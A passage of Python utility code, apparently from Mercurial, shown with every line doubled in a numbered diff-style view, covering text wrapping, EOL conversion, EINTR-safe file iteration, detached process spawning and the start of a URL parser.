2225 >>> processlinerange(2, 1)
2225 >>> processlinerange(2, 1)
2226 Traceback (most recent call last):
2226 Traceback (most recent call last):
2227 ...
2227 ...
2228 ParseError: line range must be positive
2228 ParseError: line range must be positive
2229 >>> processlinerange(0, 5)
2229 >>> processlinerange(0, 5)
2230 Traceback (most recent call last):
2230 Traceback (most recent call last):
2231 ...
2231 ...
2232 ParseError: fromline must be strictly positive
2232 ParseError: fromline must be strictly positive
2233 """
2233 """
2234 if toline - fromline < 0:
2234 if toline - fromline < 0:
2235 raise error.ParseError(_("line range must be positive"))
2235 raise error.ParseError(_("line range must be positive"))
2236 if fromline < 1:
2236 if fromline < 1:
2237 raise error.ParseError(_("fromline must be strictly positive"))
2237 raise error.ParseError(_("fromline must be strictly positive"))
2238 return fromline - 1, toline
2238 return fromline - 1, toline
2239
2239
2240 bytecount = unitcountfn(
2240 bytecount = unitcountfn(
2241 (100, 1 << 30, _('%.0f GB')),
2241 (100, 1 << 30, _('%.0f GB')),
2242 (10, 1 << 30, _('%.1f GB')),
2242 (10, 1 << 30, _('%.1f GB')),
2243 (1, 1 << 30, _('%.2f GB')),
2243 (1, 1 << 30, _('%.2f GB')),
2244 (100, 1 << 20, _('%.0f MB')),
2244 (100, 1 << 20, _('%.0f MB')),
2245 (10, 1 << 20, _('%.1f MB')),
2245 (10, 1 << 20, _('%.1f MB')),
2246 (1, 1 << 20, _('%.2f MB')),
2246 (1, 1 << 20, _('%.2f MB')),
2247 (100, 1 << 10, _('%.0f KB')),
2247 (100, 1 << 10, _('%.0f KB')),
2248 (10, 1 << 10, _('%.1f KB')),
2248 (10, 1 << 10, _('%.1f KB')),
2249 (1, 1 << 10, _('%.2f KB')),
2249 (1, 1 << 10, _('%.2f KB')),
2250 (1, 1, _('%.0f bytes')),
2250 (1, 1, _('%.0f bytes')),
2251 )
2251 )
2252
2252
2253 # Matches a single EOL which can either be a CRLF where repeated CR
2253 # Matches a single EOL which can either be a CRLF where repeated CR
2254 # are removed or a LF. We do not care about old Macintosh files, so a
2254 # are removed or a LF. We do not care about old Macintosh files, so a
2255 # stray CR is an error.
2255 # stray CR is an error.
2256 _eolre = remod.compile(br'\r*\n')
2256 _eolre = remod.compile(br'\r*\n')
2257
2257
2258 def tolf(s):
2258 def tolf(s):
2259 return _eolre.sub('\n', s)
2259 return _eolre.sub('\n', s)
2260
2260
2261 def tocrlf(s):
2261 def tocrlf(s):
2262 return _eolre.sub('\r\n', s)
2262 return _eolre.sub('\r\n', s)
2263
2263
2264 if pycompat.oslinesep == '\r\n':
2264 if pycompat.oslinesep == '\r\n':
2265 tonativeeol = tocrlf
2265 tonativeeol = tocrlf
2266 fromnativeeol = tolf
2266 fromnativeeol = tolf
2267 else:
2267 else:
2268 tonativeeol = pycompat.identity
2268 tonativeeol = pycompat.identity
2269 fromnativeeol = pycompat.identity
2269 fromnativeeol = pycompat.identity
2270
2270
2271 def escapestr(s):
2271 def escapestr(s):
2272 # call underlying function of s.encode('string_escape') directly for
2272 # call underlying function of s.encode('string_escape') directly for
2273 # Python 3 compatibility
2273 # Python 3 compatibility
2274 return codecs.escape_encode(s)[0]
2274 return codecs.escape_encode(s)[0]
2275
2275
2276 def unescapestr(s):
2276 def unescapestr(s):
2277 return codecs.escape_decode(s)[0]
2277 return codecs.escape_decode(s)[0]
2278
2278
2279 def forcebytestr(obj):
2279 def forcebytestr(obj):
2280 """Portably format an arbitrary object (e.g. exception) into a byte
2280 """Portably format an arbitrary object (e.g. exception) into a byte
2281 string."""
2281 string."""
2282 try:
2282 try:
2283 return pycompat.bytestr(obj)
2283 return pycompat.bytestr(obj)
2284 except UnicodeEncodeError:
2284 except UnicodeEncodeError:
2285 # non-ascii string, may be lossy
2285 # non-ascii string, may be lossy
2286 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2286 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2287
2287
2288 def uirepr(s):
2288 def uirepr(s):
2289 # Avoid double backslash in Windows path repr()
2289 # Avoid double backslash in Windows path repr()
2290 return repr(s).replace('\\\\', '\\')
2290 return repr(s).replace('\\\\', '\\')
2291
2291
2292 # delay import of textwrap
2292 # delay import of textwrap
2293 def MBTextWrapper(**kwargs):
2293 def MBTextWrapper(**kwargs):
2294 class tw(textwrap.TextWrapper):
2294 class tw(textwrap.TextWrapper):
2295 """
2295 """
2296 Extend TextWrapper for width-awareness.
2296 Extend TextWrapper for width-awareness.
2297
2297
2298 Neither number of 'bytes' in any encoding nor 'characters' is
2298 Neither number of 'bytes' in any encoding nor 'characters' is
2299 appropriate to calculate terminal columns for specified string.
2299 appropriate to calculate terminal columns for specified string.
2300
2300
2301 Original TextWrapper implementation uses built-in 'len()' directly,
2301 Original TextWrapper implementation uses built-in 'len()' directly,
2302 so overriding is needed to use width information of each characters.
2302 so overriding is needed to use width information of each characters.
2303
2303
2304 In addition, characters classified into 'ambiguous' width are
2304 In addition, characters classified into 'ambiguous' width are
2305 treated as wide in East Asian area, but as narrow in other.
2305 treated as wide in East Asian area, but as narrow in other.
2306
2306
2307 This requires use decision to determine width of such characters.
2307 This requires use decision to determine width of such characters.
2308 """
2308 """
2309 def _cutdown(self, ucstr, space_left):
2309 def _cutdown(self, ucstr, space_left):
2310 l = 0
2310 l = 0
2311 colwidth = encoding.ucolwidth
2311 colwidth = encoding.ucolwidth
2312 for i in xrange(len(ucstr)):
2312 for i in xrange(len(ucstr)):
2313 l += colwidth(ucstr[i])
2313 l += colwidth(ucstr[i])
2314 if space_left < l:
2314 if space_left < l:
2315 return (ucstr[:i], ucstr[i:])
2315 return (ucstr[:i], ucstr[i:])
2316 return ucstr, ''
2316 return ucstr, ''
2317
2317
2318 # overriding of base class
2318 # overriding of base class
2319 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2319 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2320 space_left = max(width - cur_len, 1)
2320 space_left = max(width - cur_len, 1)
2321
2321
2322 if self.break_long_words:
2322 if self.break_long_words:
2323 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2323 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2324 cur_line.append(cut)
2324 cur_line.append(cut)
2325 reversed_chunks[-1] = res
2325 reversed_chunks[-1] = res
2326 elif not cur_line:
2326 elif not cur_line:
2327 cur_line.append(reversed_chunks.pop())
2327 cur_line.append(reversed_chunks.pop())
2328
2328
2329 # this overriding code is imported from TextWrapper of Python 2.6
2329 # this overriding code is imported from TextWrapper of Python 2.6
2330 # to calculate columns of string by 'encoding.ucolwidth()'
2330 # to calculate columns of string by 'encoding.ucolwidth()'
2331 def _wrap_chunks(self, chunks):
2331 def _wrap_chunks(self, chunks):
2332 colwidth = encoding.ucolwidth
2332 colwidth = encoding.ucolwidth
2333
2333
2334 lines = []
2334 lines = []
2335 if self.width <= 0:
2335 if self.width <= 0:
2336 raise ValueError("invalid width %r (must be > 0)" % self.width)
2336 raise ValueError("invalid width %r (must be > 0)" % self.width)
2337
2337
2338 # Arrange in reverse order so items can be efficiently popped
2338 # Arrange in reverse order so items can be efficiently popped
2339 # from a stack of chucks.
2339 # from a stack of chucks.
2340 chunks.reverse()
2340 chunks.reverse()
2341
2341
2342 while chunks:
2342 while chunks:
2343
2343
2344 # Start the list of chunks that will make up the current line.
2344 # Start the list of chunks that will make up the current line.
2345 # cur_len is just the length of all the chunks in cur_line.
2345 # cur_len is just the length of all the chunks in cur_line.
2346 cur_line = []
2346 cur_line = []
2347 cur_len = 0
2347 cur_len = 0
2348
2348
2349 # Figure out which static string will prefix this line.
2349 # Figure out which static string will prefix this line.
2350 if lines:
2350 if lines:
2351 indent = self.subsequent_indent
2351 indent = self.subsequent_indent
2352 else:
2352 else:
2353 indent = self.initial_indent
2353 indent = self.initial_indent
2354
2354
2355 # Maximum width for this line.
2355 # Maximum width for this line.
2356 width = self.width - len(indent)
2356 width = self.width - len(indent)
2357
2357
2358 # First chunk on line is whitespace -- drop it, unless this
2358 # First chunk on line is whitespace -- drop it, unless this
2359 # is the very beginning of the text (i.e. no lines started yet).
2359 # is the very beginning of the text (i.e. no lines started yet).
2360 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2360 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2361 del chunks[-1]
2361 del chunks[-1]
2362
2362
2363 while chunks:
2363 while chunks:
2364 l = colwidth(chunks[-1])
2364 l = colwidth(chunks[-1])
2365
2365
2366 # Can at least squeeze this chunk onto the current line.
2366 # Can at least squeeze this chunk onto the current line.
2367 if cur_len + l <= width:
2367 if cur_len + l <= width:
2368 cur_line.append(chunks.pop())
2368 cur_line.append(chunks.pop())
2369 cur_len += l
2369 cur_len += l
2370
2370
2371 # Nope, this line is full.
2371 # Nope, this line is full.
2372 else:
2372 else:
2373 break
2373 break
2374
2374
2375 # The current line is full, and the next chunk is too big to
2375 # The current line is full, and the next chunk is too big to
2376 # fit on *any* line (not just this one).
2376 # fit on *any* line (not just this one).
2377 if chunks and colwidth(chunks[-1]) > width:
2377 if chunks and colwidth(chunks[-1]) > width:
2378 self._handle_long_word(chunks, cur_line, cur_len, width)
2378 self._handle_long_word(chunks, cur_line, cur_len, width)
2379
2379
2380 # If the last chunk on this line is all whitespace, drop it.
2380 # If the last chunk on this line is all whitespace, drop it.
2381 if (self.drop_whitespace and
2381 if (self.drop_whitespace and
2382 cur_line and cur_line[-1].strip() == r''):
2382 cur_line and cur_line[-1].strip() == r''):
2383 del cur_line[-1]
2383 del cur_line[-1]
2384
2384
2385 # Convert current line back to a string and store it in list
2385 # Convert current line back to a string and store it in list
2386 # of all lines (return value).
2386 # of all lines (return value).
2387 if cur_line:
2387 if cur_line:
2388 lines.append(indent + r''.join(cur_line))
2388 lines.append(indent + r''.join(cur_line))
2389
2389
2390 return lines
2390 return lines
2391
2391
2392 global MBTextWrapper
2392 global MBTextWrapper
2393 MBTextWrapper = tw
2393 MBTextWrapper = tw
2394 return tw(**kwargs)
2394 return tw(**kwargs)
2395
2395
2396 def wrap(line, width, initindent='', hangindent=''):
2396 def wrap(line, width, initindent='', hangindent=''):
2397 maxindent = max(len(hangindent), len(initindent))
2397 maxindent = max(len(hangindent), len(initindent))
2398 if width <= maxindent:
2398 if width <= maxindent:
2399 # adjust for weird terminal size
2399 # adjust for weird terminal size
2400 width = max(78, maxindent + 1)
2400 width = max(78, maxindent + 1)
2401 line = line.decode(pycompat.sysstr(encoding.encoding),
2401 line = line.decode(pycompat.sysstr(encoding.encoding),
2402 pycompat.sysstr(encoding.encodingmode))
2402 pycompat.sysstr(encoding.encodingmode))
2403 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2403 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2404 pycompat.sysstr(encoding.encodingmode))
2404 pycompat.sysstr(encoding.encodingmode))
2405 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2405 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2406 pycompat.sysstr(encoding.encodingmode))
2406 pycompat.sysstr(encoding.encodingmode))
2407 wrapper = MBTextWrapper(width=width,
2407 wrapper = MBTextWrapper(width=width,
2408 initial_indent=initindent,
2408 initial_indent=initindent,
2409 subsequent_indent=hangindent)
2409 subsequent_indent=hangindent)
2410 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2410 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2411
2411
2412 if (pyplatform.python_implementation() == 'CPython' and
2412 if (pyplatform.python_implementation() == 'CPython' and
2413 sys.version_info < (3, 0)):
2413 sys.version_info < (3, 0)):
2414 # There is an issue in CPython that some IO methods do not handle EINTR
2414 # There is an issue in CPython that some IO methods do not handle EINTR
2415 # correctly. The following table shows what CPython version (and functions)
2415 # correctly. The following table shows what CPython version (and functions)
2416 # are affected (buggy: has the EINTR bug, okay: otherwise):
2416 # are affected (buggy: has the EINTR bug, okay: otherwise):
2417 #
2417 #
2418 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2418 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2419 # --------------------------------------------------
2419 # --------------------------------------------------
2420 # fp.__iter__ | buggy | buggy | okay
2420 # fp.__iter__ | buggy | buggy | okay
2421 # fp.read* | buggy | okay [1] | okay
2421 # fp.read* | buggy | okay [1] | okay
2422 #
2422 #
2423 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2423 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2424 #
2424 #
2425 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2425 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2426 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2426 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2427 #
2427 #
2428 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2428 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2429 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2429 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2430 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2430 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2431 # fp.__iter__ but not other fp.read* methods.
2431 # fp.__iter__ but not other fp.read* methods.
2432 #
2432 #
2433 # On modern systems like Linux, the "read" syscall cannot be interrupted
2433 # On modern systems like Linux, the "read" syscall cannot be interrupted
2434 # when reading "fast" files like on-disk files. So the EINTR issue only
2434 # when reading "fast" files like on-disk files. So the EINTR issue only
2435 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2435 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2436 # files approximately as "fast" files and use the fast (unsafe) code path,
2436 # files approximately as "fast" files and use the fast (unsafe) code path,
2437 # to minimize the performance impact.
2437 # to minimize the performance impact.
2438 if sys.version_info >= (2, 7, 4):
2438 if sys.version_info >= (2, 7, 4):
2439 # fp.readline deals with EINTR correctly, use it as a workaround.
2439 # fp.readline deals with EINTR correctly, use it as a workaround.
2440 def _safeiterfile(fp):
2440 def _safeiterfile(fp):
2441 return iter(fp.readline, '')
2441 return iter(fp.readline, '')
2442 else:
2442 else:
2443 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2443 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2444 # note: this may block longer than necessary because of bufsize.
2444 # note: this may block longer than necessary because of bufsize.
2445 def _safeiterfile(fp, bufsize=4096):
2445 def _safeiterfile(fp, bufsize=4096):
2446 fd = fp.fileno()
2446 fd = fp.fileno()
2447 line = ''
2447 line = ''
2448 while True:
2448 while True:
2449 try:
2449 try:
2450 buf = os.read(fd, bufsize)
2450 buf = os.read(fd, bufsize)
2451 except OSError as ex:
2451 except OSError as ex:
2452 # os.read only raises EINTR before any data is read
2452 # os.read only raises EINTR before any data is read
2453 if ex.errno == errno.EINTR:
2453 if ex.errno == errno.EINTR:
2454 continue
2454 continue
2455 else:
2455 else:
2456 raise
2456 raise
2457 line += buf
2457 line += buf
2458 if '\n' in buf:
2458 if '\n' in buf:
2459 splitted = line.splitlines(True)
2459 splitted = line.splitlines(True)
2460 line = ''
2460 line = ''
2461 for l in splitted:
2461 for l in splitted:
2462 if l[-1] == '\n':
2462 if l[-1] == '\n':
2463 yield l
2463 yield l
2464 else:
2464 else:
2465 line = l
2465 line = l
2466 if not buf:
2466 if not buf:
2467 break
2467 break
2468 if line:
2468 if line:
2469 yield line
2469 yield line
2470
2470
2471 def iterfile(fp):
2471 def iterfile(fp):
2472 fastpath = True
2472 fastpath = True
2473 if type(fp) is file:
2473 if type(fp) is file:
2474 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2474 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2475 if fastpath:
2475 if fastpath:
2476 return fp
2476 return fp
2477 else:
2477 else:
2478 return _safeiterfile(fp)
2478 return _safeiterfile(fp)
2479 else:
2479 else:
2480 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2480 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2481 def iterfile(fp):
2481 def iterfile(fp):
2482 return fp
2482 return fp
2483
2483
2484 def iterlines(iterator):
2484 def iterlines(iterator):
2485 for chunk in iterator:
2485 for chunk in iterator:
2486 for line in chunk.splitlines():
2486 for line in chunk.splitlines():
2487 yield line
2487 yield line
2488
2488
2489 def expandpath(path):
2489 def expandpath(path):
2490 return os.path.expanduser(os.path.expandvars(path))
2490 return os.path.expanduser(os.path.expandvars(path))
2491
2491
2492 def hgcmd():
2492 def hgcmd():
2493 """Return the command used to execute current hg
2493 """Return the command used to execute current hg
2494
2494
2495 This is different from hgexecutable() because on Windows we want
2495 This is different from hgexecutable() because on Windows we want
2496 to avoid things opening new shell windows like batch files, so we
2496 to avoid things opening new shell windows like batch files, so we
2497 get either the python call or current executable.
2497 get either the python call or current executable.
2498 """
2498 """
2499 if mainfrozen():
2499 if mainfrozen():
2500 if getattr(sys, 'frozen', None) == 'macosx_app':
2500 if getattr(sys, 'frozen', None) == 'macosx_app':
2501 # Env variable set by py2app
2501 # Env variable set by py2app
2502 return [encoding.environ['EXECUTABLEPATH']]
2502 return [encoding.environ['EXECUTABLEPATH']]
2503 else:
2503 else:
2504 return [pycompat.sysexecutable]
2504 return [pycompat.sysexecutable]
2505 return gethgcmd()
2505 return gethgcmd()
2506
2506
2507 def rundetached(args, condfn):
2507 def rundetached(args, condfn):
2508 """Execute the argument list in a detached process.
2508 """Execute the argument list in a detached process.
2509
2509
2510 condfn is a callable which is called repeatedly and should return
2510 condfn is a callable which is called repeatedly and should return
2511 True once the child process is known to have started successfully.
2511 True once the child process is known to have started successfully.
2512 At this point, the child process PID is returned. If the child
2512 At this point, the child process PID is returned. If the child
2513 process fails to start or finishes before condfn() evaluates to
2513 process fails to start or finishes before condfn() evaluates to
2514 True, return -1.
2514 True, return -1.
2515 """
2515 """
2516 # Windows case is easier because the child process is either
2516 # Windows case is easier because the child process is either
2517 # successfully starting and validating the condition or exiting
2517 # successfully starting and validating the condition or exiting
2518 # on failure. We just poll on its PID. On Unix, if the child
2518 # on failure. We just poll on its PID. On Unix, if the child
2519 # process fails to start, it will be left in a zombie state until
2519 # process fails to start, it will be left in a zombie state until
2520 # the parent wait on it, which we cannot do since we expect a long
2520 # the parent wait on it, which we cannot do since we expect a long
2521 # running process on success. Instead we listen for SIGCHLD telling
2521 # running process on success. Instead we listen for SIGCHLD telling
2522 # us our child process terminated.
2522 # us our child process terminated.
2523 terminated = set()
2523 terminated = set()
2524 def handler(signum, frame):
2524 def handler(signum, frame):
2525 terminated.add(os.wait())
2525 terminated.add(os.wait())
2526 prevhandler = None
2526 prevhandler = None
2527 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2527 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2528 if SIGCHLD is not None:
2528 if SIGCHLD is not None:
2529 prevhandler = signal.signal(SIGCHLD, handler)
2529 prevhandler = signal.signal(SIGCHLD, handler)
2530 try:
2530 try:
2531 pid = spawndetached(args)
2531 pid = spawndetached(args)
2532 while not condfn():
2532 while not condfn():
2533 if ((pid in terminated or not testpid(pid))
2533 if ((pid in terminated or not testpid(pid))
2534 and not condfn()):
2534 and not condfn()):
2535 return -1
2535 return -1
2536 time.sleep(0.1)
2536 time.sleep(0.1)
2537 return pid
2537 return pid
2538 finally:
2538 finally:
2539 if prevhandler is not None:
2539 if prevhandler is not None:
2540 signal.signal(signal.SIGCHLD, prevhandler)
2540 signal.signal(signal.SIGCHLD, prevhandler)
2541
2541
2542 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2542 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2543 """Return the result of interpolating items in the mapping into string s.
2543 """Return the result of interpolating items in the mapping into string s.
2544
2544
2545 prefix is a single character string, or a two character string with
2545 prefix is a single character string, or a two character string with
2546 a backslash as the first character if the prefix needs to be escaped in
2546 a backslash as the first character if the prefix needs to be escaped in
2547 a regular expression.
2547 a regular expression.
2548
2548
2549 fn is an optional function that will be applied to the replacement text
2549 fn is an optional function that will be applied to the replacement text
2550 just before replacement.
2550 just before replacement.
2551
2551
2552 escape_prefix is an optional flag that allows using doubled prefix for
2552 escape_prefix is an optional flag that allows using doubled prefix for
2553 its escaping.
2553 its escaping.
2554 """
2554 """
2555 fn = fn or (lambda s: s)
2555 fn = fn or (lambda s: s)
2556 patterns = '|'.join(mapping.keys())
2556 patterns = '|'.join(mapping.keys())
2557 if escape_prefix:
2557 if escape_prefix:
2558 patterns += '|' + prefix
2558 patterns += '|' + prefix
2559 if len(prefix) > 1:
2559 if len(prefix) > 1:
2560 prefix_char = prefix[1:]
2560 prefix_char = prefix[1:]
2561 else:
2561 else:
2562 prefix_char = prefix
2562 prefix_char = prefix
2563 mapping[prefix_char] = prefix_char
2563 mapping[prefix_char] = prefix_char
2564 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2564 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2565 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2565 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2566
2566
2567 def getport(port):
2567 def getport(port):
2568 """Return the port for a given network service.
2568 """Return the port for a given network service.
2569
2569
2570 If port is an integer, it's returned as is. If it's a string, it's
2570 If port is an integer, it's returned as is. If it's a string, it's
2571 looked up using socket.getservbyname(). If there's no matching
2571 looked up using socket.getservbyname(). If there's no matching
2572 service, error.Abort is raised.
2572 service, error.Abort is raised.
2573 """
2573 """
2574 try:
2574 try:
2575 return int(port)
2575 return int(port)
2576 except ValueError:
2576 except ValueError:
2577 pass
2577 pass
2578
2578
2579 try:
2579 try:
2580 return socket.getservbyname(port)
2580 return socket.getservbyname(port)
2581 except socket.error:
2581 except socket.error:
2582 raise Abort(_("no port number associated with service '%s'") % port)
2582 raise Abort(_("no port number associated with service '%s'") % port)
2583
2583
2584 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2584 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2585 '0': False, 'no': False, 'false': False, 'off': False,
2585 '0': False, 'no': False, 'false': False, 'off': False,
2586 'never': False}
2586 'never': False}
2587
2587
2588 def parsebool(s):
2588 def parsebool(s):
2589 """Parse s into a boolean.
2589 """Parse s into a boolean.
2590
2590
2591 If s is not a valid boolean, returns None.
2591 If s is not a valid boolean, returns None.
2592 """
2592 """
2593 return _booleans.get(s.lower(), None)
2593 return _booleans.get(s.lower(), None)
2594
2594
2595 _hextochr = dict((a + b, chr(int(a + b, 16)))
2595 _hextochr = dict((a + b, chr(int(a + b, 16)))
2596 for a in string.hexdigits for b in string.hexdigits)
2596 for a in string.hexdigits for b in string.hexdigits)
2597
2597
2598 class url(object):
2598 class url(object):
2599 r"""Reliable URL parser.
2599 r"""Reliable URL parser.
2600
2600
2601 This parses URLs and provides attributes for the following
2601 This parses URLs and provides attributes for the following
2602 components:
2602 components:
2603
2603
2604 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2604 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2605
2605
2606 Missing components are set to None. The only exception is
2606 Missing components are set to None. The only exception is
2607 fragment, which is set to '' if present but empty.
2607 fragment, which is set to '' if present but empty.
2608
2608
2609 If parsefragment is False, fragment is included in query. If
2609 If parsefragment is False, fragment is included in query. If
2610 parsequery is False, query is included in path. If both are
2610 parsequery is False, query is included in path. If both are
2611 False, both fragment and query are included in path.
2611 False, both fragment and query are included in path.
2612
2612
2613 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2613 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2614
2614
2615 Note that for backward compatibility reasons, bundle URLs do not
2615 Note that for backward compatibility reasons, bundle URLs do not
2616 take host names. That means 'bundle://../' has a path of '../'.
2616 take host names. That means 'bundle://../' has a path of '../'.
2617
2617
2618 Examples:
2618 Examples:
2619
2619
2620 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2620 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2621 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2621 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2622 >>> url('ssh://[::1]:2200//home/joe/repo')
2622 >>> url('ssh://[::1]:2200//home/joe/repo')
2623 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2623 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2624 >>> url('file:///home/joe/repo')
2624 >>> url('file:///home/joe/repo')
2625 <url scheme: 'file', path: '/home/joe/repo'>
2625 <url scheme: 'file', path: '/home/joe/repo'>
2626 >>> url('file:///c:/temp/foo/')
2626 >>> url('file:///c:/temp/foo/')
2627 <url scheme: 'file', path: 'c:/temp/foo/'>
2627 <url scheme: 'file', path: 'c:/temp/foo/'>
2628 >>> url('bundle:foo')
2628 >>> url('bundle:foo')
2629 <url scheme: 'bundle', path: 'foo'>
2629 <url scheme: 'bundle', path: 'foo'>
2630 >>> url('bundle://../foo')
2630 >>> url('bundle://../foo')
2631 <url scheme: 'bundle', path: '../foo'>
2631 <url scheme: 'bundle', path: '../foo'>
2632 >>> url(r'c:\foo\bar')
2632 >>> url(r'c:\foo\bar')
2633 <url path: 'c:\\foo\\bar'>
2633 <url path: 'c:\\foo\\bar'>
2634 >>> url(r'\\blah\blah\blah')
2634 >>> url(r'\\blah\blah\blah')
2635 <url path: '\\\\blah\\blah\\blah'>
2635 <url path: '\\\\blah\\blah\\blah'>
2636 >>> url(r'\\blah\blah\blah#baz')
2636 >>> url(r'\\blah\blah\blah#baz')
2637 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2637 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2638 >>> url(r'file:///C:\users\me')
2638 >>> url(r'file:///C:\users\me')
2639 <url scheme: 'file', path: 'C:\\users\\me'>
2639 <url scheme: 'file', path: 'C:\\users\\me'>
2640
2640
2641 Authentication credentials:
2641 Authentication credentials:
2642
2642
2643 >>> url('ssh://joe:xyz@x/repo')
2643 >>> url('ssh://joe:xyz@x/repo')
2644 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2644 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2645 >>> url('ssh://joe@x/repo')
2645 >>> url('ssh://joe@x/repo')
2646 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2646 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2647
2647
2648 Query strings and fragments:
2648 Query strings and fragments:
2649
2649
2650 >>> url('http://host/a?b#c')
2650 >>> url('http://host/a?b#c')
2651 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2651 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2652 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2652 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2653 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2653 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2654
2654
2655 Empty path:
2655 Empty path:
2656
2656
2657 >>> url('')
2657 >>> url('')
2658 <url path: ''>
2658 <url path: ''>
2659 >>> url('#a')
2659 >>> url('#a')
2660 <url path: '', fragment: 'a'>
2660 <url path: '', fragment: 'a'>
2661 >>> url('http://host/')
2661 >>> url('http://host/')
2662 <url scheme: 'http', host: 'host', path: ''>
2662 <url scheme: 'http', host: 'host', path: ''>
2663 >>> url('http://host/#a')
2663 >>> url('http://host/#a')
2664 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2664 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2665
2665
2666 Only scheme:
2666 Only scheme:
2667
2667
2668 >>> url('http:')
2668 >>> url('http:')
2669 <url scheme: 'http'>
2669 <url scheme: 'http'>
2670 """
2670 """
2671
2671
2672 _safechars = "!~*'()+"
2672 _safechars = "!~*'()+"
2673 _safepchars = "/!~*'()+:\\"
2673 _safepchars = "/!~*'()+:\\"
2674 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2674 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2675
2675
2676 def __init__(self, path, parsequery=True, parsefragment=True):
2676 def __init__(self, path, parsequery=True, parsefragment=True):
2677 # We slowly chomp away at path until we have only the path left
2677 # We slowly chomp away at path until we have only the path left
2678 self.scheme = self.user = self.passwd = self.host = None
2678 self.scheme = self.user = self.passwd = self.host = None
2679 self.port = self.path = self.query = self.fragment = None
2679 self.port = self.path = self.query = self.fragment = None
2680 self._localpath = True
2680 self._localpath = True
2681 self._hostport = ''
2681 self._hostport = ''
2682 self._origpath = path
2682 self._origpath = path
2683
2683
2684 if parsefragment and '#' in path:
2684 if parsefragment and '#' in path:
2685 path, self.fragment = path.split('#', 1)
2685 path, self.fragment = path.split('#', 1)
2686
2686
2687 # special case for Windows drive letters and UNC paths
2687 # special case for Windows drive letters and UNC paths
2688 if hasdriveletter(path) or path.startswith('\\\\'):
2688 if hasdriveletter(path) or path.startswith('\\\\'):
2689 self.path = path
2689 self.path = path
2690 return
2690 return
2691
2691
2692 # For compatibility reasons, we can't handle bundle paths as
2692 # For compatibility reasons, we can't handle bundle paths as
2693 # normal URLS
2693 # normal URLS
2694 if path.startswith('bundle:'):
2694 if path.startswith('bundle:'):
2695 self.scheme = 'bundle'
2695 self.scheme = 'bundle'
2696 path = path[7:]
2696 path = path[7:]
2697 if path.startswith('//'):
2697 if path.startswith('//'):
2698 path = path[2:]
